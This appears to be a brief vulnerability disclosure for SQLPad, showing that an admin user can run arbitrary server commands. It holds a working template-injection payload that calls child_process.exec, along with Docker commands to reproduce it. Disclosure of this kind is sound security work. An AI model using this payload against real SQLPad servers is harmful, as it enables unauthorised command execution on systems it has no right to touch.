Please enter a description of the vulnerability.
sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
sudo docker exec -it sqlpad cat /tmp/pwn
An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.